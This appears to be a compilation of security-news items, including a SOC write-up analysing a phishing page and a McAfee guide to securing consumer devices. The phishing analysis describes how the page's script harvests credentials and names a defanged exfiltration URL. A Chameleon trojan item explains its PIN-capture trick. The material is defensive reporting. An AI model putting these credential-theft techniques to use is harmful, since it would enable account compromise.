Cisco Talos announced that a decryption key for the Babuk Tortilla ransomware variant is available for victims to download

Read More

This is an old piece of malware—the Chameleon Android banking Trojan—that now disables biometric authentication in order to steal the PIN:

The second notable new feature is the ability to interrupt biometric operations on the device, like fingerprint and face unlock, by using the Accessibility service to force a fallback to PIN or password authentication.

The malware captures any PINs and passwords the victim enters to unlock their device and can later use them to unlock the device at will to perform malicious activities hidden from view.

Read More

Clients of a pregnancy care clinic in Ontario have had their personal information exposed to hackers.

I’m sure I don’t need to tell anyone who has made use of the services of a midwife, that a lot can happen in nine months…

Read more in my article on the Hot for Security blog.

Read More

Executive summary

In the current cyber landscape, adversaries commonly employ phishing as the leading technique to compromise enterprise security. The susceptibility of human behavior makes individuals the weakest link in the security chain. Consequently, there is an urgent need for robust cybersecurity measures. Phishing, which capitalizes on exploiting human behavior and vulnerabilities, remains the adversary’s top choice. To counter this threat effectively, ongoing education and awareness initiatives are essential. Organizations must recognize and address the pivotal role of human vulnerability in cybersecurity.

During regular business hours, an alarm was generated due to a customer’s user that had interacted with a potentially malicious phishing link. This prompted a thorough investigation conducted by analysts that involved leveraging multiple Open-Source Intelligence (OSINT) tools such as VirusTotal and URLscan.io. Through a meticulous examination, analysts were able to unveil suspicious scripts within the phishing webpage’s Document Object Model (DOM) that pinpointed an attempt to exfiltrate user credentials. This detailed analysis emphasizes the importance of proactive cybersecurity measures and showcases the effectiveness of analysts leveraging OSINT tools along with their expertise to accurately assess threats within customer’s environments.

Investigation

The alarm

The Managed Detection and Response (MDR) Security Operations Center (SOC) initially received an alarm triggered by a potentially malicious URL that a user received in their inbox. Office 365’s threat intelligence feed flagged this URL as potentially malicious. The initial steps in addressing this alarm involve two key actions.

First, it is crucial to determine the scope of impact on the customer’s environment by assessing how many other users received the same URL. Second, a thorough validation process is essential to confirm whether the URL is indeed malicious. These initial steps lay the foundation for a comprehensive response to safeguard the security of the environment.

To determine how many users received the same URL, a comprehensive search within the customer’s environment revealed that no other users received the same URL. As a result, only one user is affected, suggesting that this is an isolated incident and does not appear to be part of a targeted attack on the customer’s environment. With this understanding, the focus can now shift to the second step: Validating the reputation of the URL.

By employing the OSINT tool VirusTotal and inputting the URL received by the user, we aim to assess its potential threat level. VirusTotal aggregates results from various security vendors to provide a comprehensive analysis. In the current evaluation, 13 out of 90 security vendors classify this URL as malicious. It’s important to note that while the number of vendors flagging the URL is a key factor, a conclusive determination of malicious intent typically considers a consensus among a significant portion of these vendors. A higher number of detections by diverse security platforms strengthens the confidence in labeling the URL as malicious.

With a potentially malicious URL identified, it is imperative to delve deeper to ascertain the underlying reasons for its malicious reputation. Analysts will utilize a tool such as URLscan.io for this purpose. URLscan.io serves as a sandbox, providing a risk-free environment for visiting websites. This tool is instrumental in conducting a thorough examination to uncover the nuances contributing to the URL’s malicious classification.

After entering our identified malicious URL into URLscan.io, we can examine the webpage intended for our customer’s user. Upon visiting this URL, a PDF file is prepared for user download. However, a mere screenshot of the webpage is insufficient to provide a definitive reputation. To obtain more insight, we must delve deeper into the webpage by examining its DOM.

The DOM comprises the essential components of a webpage, encompassing HTML, CSS, and JavaScript that define the structure, presentation, and behavior of the page. URLscan.io facilitates a convenient examination of the DOM. In reviewing the DOM, particular attention is given to identifying any malicious scripts that may be present. The focus is often on searching for the HTML tags, which denote script elements within a webpage.

In the evaluation of the DOM associated with the potentially malicious URL, multiple tags are observed. Within these tags, it becomes apparent that upon the user’s interaction with the “download all” button, a prompt will request them to input their email and password.

This is the start of the script that defines the email and password variables.

Continuing through the script, more concerning code emerges. While the user is prompted to enter email and password information, it becomes apparent that the adversary has crafted code designed to falsely claim that the entered email and/or password is incorrect, even if it is not. This behavior aligns with typical phishing activities, where malicious actors attempt to induce users to enter their credentials multiple times. This tactic aims to exploit potential typos or errors in the entered information, ensuring that the adversary ultimately obtains the correct credentials from the victim.

After the user submits their credentials, the user’s email and password are transmitted to the website “hxxps://btmalta.cam/wefmail/email (1).php” via an AJAX POST request. In the context of web development, an AJAX (Asynchronous JavaScript and XML) POST is a technique that allows data to be sent to a server asynchronously without requiring a page refresh. Unfortunately, malicious actors exploit this functionality to surreptitiously transmit sensitive user information, as observed in this instance.

Conducting OSINT on the aforementioned site (“hxxps://btmalta.cam/wefmail/email (1).php”) reveals a malicious reputation, notably marked by its relatively recent creation, being only 80 days old from the registry date. The registration age of a domain is a useful factor in assessing its credibility. In this case, the combination of a newly registered domain and indications of malicious activity raises significant concerns. It strongly suggests that the adversary is likely utilizing this domain to collect the user-entered email and password deliberately.

Considering the aforementioned details, it becomes more evident that this is a credible phishing attempt targeting one of our customers’ users. The method of data transmission, the malicious reputation of the domain, and its recent registration collectively underscore the severity of the situation.

Customer interaction

After the findings were observed, an investigation was created for the customer to review. If the customer’s affected user entered any credential information, this means the user account should be considered compromised. Since this affected a user within the customers Office365 environment, it was recommended for the customer follow the guidelines set by Microsoft in an event of an email account compromise: Responding to a compromised email account

How to combat against phishing attempts

In the ongoing battle against phishing attempts, implementing effective strategies is paramount to fortifying cybersecurity defenses. Listed below are some of the many key practices and countermeasures to safeguard your organization from falling victim to malicious phishing activities.

Ensure that users go through regular security training to learn about the dangers of potential phishing attempts.
Employ processes that allow users to report potential phishing emails that they receive.
Ensure users are properly utilizing Multi-Factor Authentication (MFA)
Ensure strong password policies are in place to prevent any weak or insecure passwords from being used.
To check to see if your password or email has ever been involved in a data breach you can use the free tool https://haveibeenpwned.com/ to check.

Read More

A Nigerian national has been sentenced to a decade behind bars for his role in romance and BEC scam

Read More

Mortgage lender LoanDepot has revealed a ransomware breach resulting in stolen and encrypted data

Read More

New year, new tech. That’s what hits the floor at the CES show each January in Las Vegas. Whether it’s striking, strange, or just pretty cool, plenty of this year’s tech is connected — and that means it needs to get protected.  

Already we’ve seen a personal health scanner that works like a tricorder from Star Trek, smart belts that help people with limited vision get around safely, and smart locks that open your door with the palm of your hand. 

Coursing through all these connected devices are data and info — data and info about you. Your family. Your home. Your comings and goings. The kind of data and info that all kinds of people want to get their hands on. 

That’s where protection comes in. 

Any device connected to the internet must be protected. Even if it’s something as innocuous as a smart wall outlet. The reason is, your home network is only as strong as its weakest security link. And many smart devices don’t come with the best security out of the box. Hackers know this. By compromising a device like a smart wall outlet, a hacker can gain access to the rest of the network and the devices and data on it. 

But how do you protect a smart wall outlet, along with that smart coffeemaker, door lock, and refrigerator? We’ll run it down for you, plus advice for keeping the latest in medical, fitness, and mobile devices safe as well. 

How to protect your new tech

Broadly speaking, you can protect most of your tech with a handful of steps. Whether it’s a new Wi-Fi router, smartwatch, or even a connected fridge, they can all benefit from the following basics.  

Use strong, unique passwords. 

When it’s time to set up a new account or device, go with a strong, unique password. Strong means a mix of at least 12 characters, if not more. That includes a mix of numbers, symbols, and both letter cases, upper and lower. Unique means you don’t repeat it across accounts. That way, if one password gets compromised, the rest will remain secure.  

Why strong and unique? Given today’s computing power, a hacker’s password generator can create millions of passwords in seconds. Weak passwords have no chance against them. It’s a simple matter of statistics. 

Consider a password that uses eight numbers, uppercase and lowercase letters, and symbols. Sounds pretty strong, right? Unfortunately, a brute-force attack might crack that password in as fast as one second. One second …  

Password Length 

(Using numbers, uppercase 

and lowercase letters, and symbols) 

Time to Crack 

8 
One Second 

12 
Eight Months 

16 
16 Million Years 

 

However, increase that password length to twelve numbers, uppercase and lowercase letters, and symbols — it’d that eight months to crack that password. Bump it up to 16, and it would take 16 million years. The longer it is, the more complex it is. And thus tougher to crack. It’s the difference between one second and 16 million years. And if a hacker’s brute-force attack on one password takes too long, it’ll simply move onto the next one. 

A password manager can help create strong, unique passwords for you. Also found in comprehensive online protection software, a password manager can create and securely store strong and unique passwords for your mom and dad, giving them one less thing they need to remember and worry about. 

Use multi-factor authentication

Online banks, shops, and other services commonly offer multi-factor authentication to help protect your accounts — with the typical combination of your username, password, and a security code sent to another device you own (often a mobile phone).  

If your device or account supports multi-factor authentication, consider using it there too. It throws a big barrier in the way of hackers who try and force their way into your device with a password/username combination.  

Keep everything updated

Update your apps and devices regularly. In addition to fixing the odd bug or adding the occasional new feature, app and device updates often address security gaps. Out-of-date apps and devices might have flaws that hackers can exploit, so regular updating is a must from a security standpoint. If you can set your apps and devices to receive automatic updates, even better. 

Keep in mind that this very much applies to smart home devices as well. 

Secure your internet router

Another device that needs good password protection is your internet router. Make sure you use a strong and unique password there as well to help prevent hackers from breaking into your home network.  

Also consider changing the name of your home network so that it doesn’t personally identify you. Fun alternatives to using your name or address include everything from movie lines like “May the Wi-Fi be with you” to old sitcom references like “Central Perk.” Also check that your router is using an encryption method, like WPA2 or the newer WPA3, which will keep your signal secure.  

Protect (your) everything 

Comprehensive online protection software can secure your phones, tablets, and computers. Moreover, it can protect your privacy, identity, and spot scam texts, messages, and links — just to name a few of the many things it can do.  

Moreover, these devices often connect to other devices on your home network. In a way, they act as a remote control for smart home devices like thermostats, alarms, and door locks. Protecting phones, tablets, and computers thus protect those other devices by extension. 

How to protect your smart home devices 

The smarts behind a smart home come from you. At least when it comes to keeping it more private and secure. The thing with smart home devices is this, they’re connected. And anything that gets connected gets protected. That can look a little different for these devices than it does for your computers and phones, yet there are steps you can take. 

Reset the factory password

Many smart home and internet of things (IOT) devices come with preset usernames and passwords from the factory. So much so, that you can easily find lists of stock usernames and passwords for these devices posted online where hackers can get a hold of them. 

In the past, we’ve seen all kinds of attacks occur when these credentials don’t get changed. Among them are stories of hacked baby monitors where attackers take control of the camera and speakers. So just as you do for your other devices and accounts, create a fresh username and pair it with a strong, unique password as outlined above. 

Upgrade to a newer internet router 

Likewise, older routers might have outdated security measures, which might make them more prone to attacks. If you’re renting yours from your internet provider, contact them for an upgrade. If you’re using your own, visit a reputable news or review site such as Consumer Reports for a list of the best routers that combine speed, capacity, and security. 

Set up a guest network specifically for your IoT devices 

Just as you can offer your guests secure access that’s separate from your own devices, creating an additional network on your router allows you to keep your computers and smartphones separate from IoT devices. This way, if an IoT device is compromised, a hacker will still have difficulty accessing your other devices on your primary network, the one where you connect your computers and smartphones.  

One more note — research the manufacturer 

One of the strongest security measures you can take is research. Before purchasing, look up the manufacturer. Have they had security issues with their devices in the past? Are their devices well-reviewed? How about their privacy policy? What are they doing with your data?  

It can get a little tricky tracking down that kind of info, yet you have a couple of great places to start. One is Consumer Reports and their thorough reviews of devices and tech. Another resource is Mozilla Foundation’s “Privacy Not Included” site, which reviews connected products like smart home and IoT devices for safety and security. 

How to protect your telemedicine visits 

For a quick check-in, a prescription consultation, or just a conversation with a healthcare pro, telemedicine has firmly established itself as a viable option for many types of care. Of course, the info discussed and shared in such a visit can be sensitive.   

Use a VPN 

A VPN, or virtual private network, offers a strong layer of additional protection when you’re transmitting health data or having a private conversation about your health with a professional. A VPN creates an encrypted tunnel to keep you and your activity anonymous. In effect, your data is scrambled and hidden to anyone outside your VPN tunnel, thus making your private info difficult to collect. Check with the care provider to see if their telemedicine solution uses a VPN. If not, you can always get a VPN as part of your online protection software. 

Check in with your provider 

If you’re considering a virtual doctor visit, now’s a great chance to check in with your care provider before your appointment. This way, you can get comfortable with what your visit will look like, find out what special apps (if any) are used, and how your care provider will protect your privacy. Also, you can decide which device you’ll use and where you’ll use it so that you feel at ease during your virtual visit. 

A reputable care provider will likely put all this pre-appointment info together for you on their website or “frequently asked questions” (FAQ) page, which will include helpful links and numbers to call if you need help or have questions. For an example of what that might look like, check out the telemedicine page that Virginia Mason/Franciscan Health designed for its patients. 

Pick a private place 

We’ve talked plenty about digital security, yet there’s the old-fashioned issue of physical eavesdropping to think about too. When it’s time for your actual appointment, pick a place in your home where you can ensure yourself some privacy. (Of course, don’t go online for your virtual appointment in a public place.) Look for a space where you can’t be overheard by neighbors and passers-by — preferably someplace like your bedroom where you can be comfortable as well.  

How to protect your fitness and wearable devices

By design, many wearables are big on data collection. Coursing through them are all kinds of data, about your vital signs, sleep patterns, not to mention your whereabouts — like when and where you like to run on your hill training days. Keeping these devices secure means keeping some of your most personal info secure as well. 

As always, research the manufacturer 

Very similar to what we mentioned about smart home and IoT devices, check the manufacturer’s track record. Read reviews. Hit up trusted sources. In all, find out how private and secure your device is. The same resources listed above can help you make an informed purchase. 

When it comes to privacy, not all privacy policies are equal. The same goes for their privacy policies. Reading the privacy policy will tell you what kind of data the device collects. Further, it will show if and how it’s shared with the manufacturer and if they sell or share it with others. Likewise, you can factor what you find into your purchasing decision. 

Adjust the privacy settings 

This will vary from device to device as well, yet one more way you can lock down your privacy is in the device settings. Look for options around location tracking, social media sharing, and what types of data are shared online in addition to the device. Overall, consider what kind of fitness data it gathers and where it goes. If you’re not comfortable with that data ending up in the hands of a stranger, make it private. 

When upgrading to a new device, wipe your old one. 

Along the same lines, that old wearable of yours might be chock full of data. Before passing it along, selling it, or recycling it, wipe it. Remove all the old data by restoring it to factory settings (your manufacturer can show you how).  

Also, delete any old online account associated with it if you have no more use for it. See to it that any data with that account gets deleted as well, which leaves you with one less account that could wind up the target of a data breach. A service like our own McAfee Online Account Cleanup can help, which you can find in our McAfee+ plans. 

How to protect your mobile devices 

Certainly, if there’s one device that works like the remote control for our lives, it’s our smartphone. Smartphones and mobile devices like them need protection too — in their own right, and because they connect to so much more. 

Avoid third-party app stores 

Google Play and Apple’s App Store have measures in place to review and vet apps to help ensure that they are safe and secure. Third-party sites might very well not, and they might intentionally host malicious apps as part of a front. Further, Google and Apple are quick to remove malicious apps from their stores when discovered, making shopping there safer still.  

Review apps carefully

Check out the developer — have they published several other apps with many downloads and good reviews? A legit app typically has quite a few reviews, whereas malicious apps might have only a handful of (phony) five-star reviews. Lastly, look for typos and poor grammar in both the app description and screenshots. They could be a sign that a hacker slapped the app together and quickly deployed it.  

Yet better than combing through user reviews yourself is getting a recommendation from a trusted source, like a well-known publication or from app store editors themselves. In this case, much of the vetting work has been done for you by an established reviewer. A quick online search like “best fitness apps” or “best apps for travelers” should turn up articles from legitimate sites that can suggest good options and describe them in detail before you download.  

Keep an eye on app permissions

Another way hackers weasel their way into your device is by getting permissions to access things like your location, contacts, and photos — and they’ll use malicious apps to do it. If an app asks for way more than you bargained for, like a simple puzzle game that asks for access to your camera or microphone, it might be a scam. Delete the app.  

Lock your phone — and keep an eye on it too

Some bad actors will try to install spyware on phones themselves. However, this requires access, time, and effort to pull off. Locking your phone and always keeping it close can help prevent bad actors from infecting your phone this way. 

Another step you can take is to familiarize yourself with the remote locking and wiping features of your mobile device. Many manufacturers offer this feature on mobile devices. Strongly consider using it in the event of loss or theft. 

 

 

The post New Year, New Tech at CES — The Latest Protection for the Latest Tech appeared first on McAfee Blog.

Read More